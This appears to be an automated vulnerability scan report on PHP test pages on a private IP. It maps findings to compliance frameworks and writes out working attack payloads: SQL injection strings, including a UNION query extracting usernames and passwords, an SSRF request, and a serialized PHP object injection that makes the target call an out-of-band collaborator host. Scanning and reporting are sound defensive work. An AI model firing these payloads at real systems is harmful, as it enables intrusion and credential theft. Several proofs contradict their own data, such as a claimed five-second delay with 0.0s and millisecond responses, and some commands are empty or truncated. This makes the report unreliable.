| Likelihood ▼ / Impact ▶ | Negligible | Minor | Moderate | Major | Severe |
|---|---|---|---|---|---|
| Almost certain | |||||
| Likely | 1 | 1 | |||
| Possible | |||||
| Unlikely | |||||
| Rare |
| ID | Finding | CVSS | Priority | SLA |
|---|---|---|---|---|
| GGC-POI-918 | 🤖 PHP_OBJECT_INJECTION prefs | 9.8 | P0 | Fix immediately |
| GGC-SSRF-11B | 🌐 SSRF url | 7.7 | P1 | Within 7 days |
Each finding mapped to OWASP Top 10 2021, PCI-DSS v4.0, ISO/IEC 27001:2022 and GDPR. References are indicative for audit scoping, not a certification statement.
| OWASP Top 10 (2021) | # Findings | PCI-DSS v4.0 | ISO/IEC 27001:2022 | GDPR |
|---|---|---|---|---|
| A06:2021 – Vulnerable and Outdated Components | 2 | PCI-DSS v4.0 Req 6.3.1 / 6.3.3 (patch mgmt) | ISO/IEC 27001:2022 A.8.8 | GDPR Art. 32 (security of processing) |
| A03:2021 – Injection | 1 | PCI-DSS v4.0 Req 6.2.4 (injection/XSS) | ISO/IEC 27001:2022 A.8.28 | GDPR Art. 32 (security of processing) |
| A05:2021 – Security Misconfiguration | 1 | PCI-DSS v4.0 Req 2.2.1 / 6.2.4 | ISO/IEC 27001:2022 A.8.9 / A.8.28 | GDPR Art. 32 (security of processing) |
| A10:2021 – Server-Side Request Forgery (SSRF) | 1 | PCI-DSS v4.0 Req 6.2.4 | ISO/IEC 27001:2022 A.8.28 | GDPR Art. 32 (security of processing) |
| A08:2021 – Software and Data Integrity Failures | 1 | PCI-DSS v4.0 Req 6.2.4 / 6.4.3 | ISO/IEC 27001:2022 A.8.28 / A.8.29 | GDPR Art. 32 (security of processing) |
| A01:2021 – Broken Access Control | 1 | PCI-DSS v4.0 Req 6.2.4 / 7.2.1 | ISO/IEC 27001:2022 A.8.3 / A.5.15 | GDPR Art. 5(1)(f) + Art. 32 (confidentiality) |
SAST confidence = static taint-flow certainty (source→sink), not runtime proof. "Confirmed" is reserved for DAST findings the engine actually exploited.
| # | Parameter | Sink | Risk | CVSS | Static confidence | Exploit. | Impact | Location |
|---|---|---|---|---|---|---|---|---|
| 1 | id |
🗃 SQL_QUERY | Critical | 9.8 CRITICAL | Taint-flow | Direct | AUTH_BYPASS | oob_test.php |
| 2 | xml |
📄 XXE | High | 7.5 HIGH | Taint-flow | Direct | FILE_READ | oob_test.php |
| 3 | url |
🌐 SSRF | High | 8.6 HIGH | Taint-flow | Direct | INFORMATION_DISCLOSURE | oob_test.php |
| 4 | prefs |
🤖 PHP_OBJECT_INJECTION | Critical | 9.8 CRITICAL | Taint-flow | Direct | RCE | poi_oob_test.php |
| 5 | url |
🔍 PATH_TRAVERSAL | High | 7.5 HIGH | Potential | Low | FILE_READ | oob_test.php:21 |
| 6 | apache 2.4.58 · CVE-2024-38475 |
🔍 OUTDATED_COMPONENT | Critical | 9.8 CRITICAL | Taint-flow | Direct | RCE | HTTP Server / X-Powered-By banner |
| 7 | apache 2.4.58 · CVE-2024-38476 |
🔍 OUTDATED_COMPONENT | High | 7.5 HIGH | Taint-flow | Direct | DOS | HTTP Server / X-Powered-By banner |
| Endpoint | Requests | Findings | Risk |
|---|---|---|---|
| oob_test.php | 10 | 🗃 SQL_QUERY | CRITICAL |
| 2 | 🔍 OUTDATED_COMPONENT | CRITICAL | |
| http://172.26.203.184/poi_oob_test.php | 2 | 🤖 PHP_OBJECT_INJECTION | CRITICAL |
| http://172.26.203.184/oob_test.php | 4 | 🌐 SSRF | HIGH |
curl -i 'oob_test.php?id=1%20UNION%20SELECT%20SLEEP%285%29--%20-'
Proof: response took 0.0s while a non-vulnerable request returns in well under 1s — the server executed the injected delay (blind time-based injection; no data is echoed). Response body: (empty)
| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|---|---|---|---|---|---|---|
| ⚠ VULN | GET |
oob_test.php?id=1%20AND%20SLEEP%285%29--%20- |
1 AND SLEEP(5)-- - |
500 | 5ms | http-500-likely-sql-error (time-payload) | — |
| ⚠ VULN | GET |
oob_test.php?id=1%20OR%20SLEEP%285%29--%20- |
1 OR SLEEP(5)-- - |
500 | 4ms | http-500-likely-sql-error (time-payload) | — |
| ⚠ VULN | GET |
oob_test.php?id=1%29%20AND%20SLEEP%285%29--%20- |
1) AND SLEEP(5)-- - |
500 | 5ms | http-500-likely-sql-error (time-payload) | — |
| ⚠ VULN | GET |
oob_test.php?id=1%20AND%20BENCHMARK%2810000000%2CSHA1%28%27a%27%29%29--%… |
1 AND BENCHMARK(10000000,SHA1('a'))-- - |
500 | 6ms | http-500-likely-sql-error (time-payload) | — |
| ⚠ VULN | GET |
oob_test.php?id=1%20UNION%20SELECT%20SLEEP%285%29--%20- |
1 UNION SELECT SLEEP(5)-- - |
500 | 7ms | http-500-likely-sql-error (time-payload) | — |
| ⚠ VULN | GET |
oob_test.php?id=1%27 |
1' |
500 | 16ms | http-500-likely-sql-error | — |
| ⚠ VULN | GET |
oob_test.php?id=1%20OR%201%3D1--%20- |
1 OR 1=1-- - |
500 | 16ms | http-500-likely-sql-error | — |
| ⚠ VULN | GET |
oob_test.php?id=1%20UNION%20SELECT%201%2C2%2C3%2C4--%20- |
1 UNION SELECT 1,2,3,4-- - |
500 | 16ms | http-500-likely-sql-error | — |
| ⚠ VULN | GET |
oob_test.php?id=0%20UNION%20SELECT%20username%2Cpassword%2C3%2C4%20FROM%… |
0 UNION SELECT username,password,3,4 FROM users-- - |
500 | 3ms | http-500-likely-sql-error | — |
| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|
curl -i 'http://172.26.203.184/oob_test.php?url=http%3A%2F%2F172.26.192.1%3A8888%2F519205e607c1'
OOB HTTP callback received by the GGSec collaborator — the target issued an outbound request to http://172.26.192.1:8888/519205e607c1, proving blind (out-of-band) injection. The in-band HTTP response body is not the proof for this finding.
| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|
curl -i -X POST 'http://172.26.203.184/poi_oob_test.php' --data 'O:7:"Fetcher":1:{s:3:"url";s:37:"http://172.26.192.1:8888/6d57d558a5b4";}'OOB HTTP callback received by the GGSec collaborator — the target issued an outbound request to http://172.26.192.1:8888/6d57d558a5b4, proving blind (out-of-band) injection. The in-band HTTP response body is not the proof for this finding.
| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|
curl -i ''
Server banner 'Apache/2.4.58' matches CVE-2024-38475 (CWE-22, Critical): mod_rewrite improper output escaping → URL mapped to filesystem (RCE / source disclosure). Affected: version < 2.4.60. VERSION-INDICATED / UNVERIFIED — this is a banner-only match: (1) a backported distro pa…
| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|---|---|---|---|---|---|---|
| ⚠ VULN | GET |
|
outdated-component |
200 | 0ms | outdated-component | — |
curl -i ''
Server banner 'Apache/2.4.58' matches CVE-2024-38476 (CWE-476, High): mod_proxy null-pointer dereference → DoS via malicious backend response headers. Affected: version < 2.4.60. VERSION-INDICATED / UNVERIFIED — this is a banner-only match: (1) a backported distro patch may leave…
| Result | Method | URL | Payload | Status | Time | Detection | DB |
|---|---|---|---|---|---|---|---|
| ⚠ VULN | GET |
|
outdated-component |
200 | 0ms | outdated-component | — |
| Header | Status | Risk | Recommendation |
|---|---|---|---|
Content-Security-Policy |
✗ MISSING | HIGH | Prevents XSS/injection. Use nonce or strict-dynamic. |
X-Frame-Options |
✗ MISSING | MEDIUM | Prevents clickjacking. Use DENY or SAMEORIGIN. |
X-Content-Type-Options |
✗ MISSING | LOW | Prevents MIME sniffing. Set to nosniff. |
Strict-Transport-Security |
✗ MISSING | MEDIUM | Enforces HTTPS. min-age=31536000; includeSubDomains. |
Referrer-Policy |
✗ MISSING | LOW | Limits referrer leakage. strict-origin-when-cross-origin. |
Permissions-Policy |
✗ MISSING | LOW | Restrict unused browser features (camera, mic, geo). |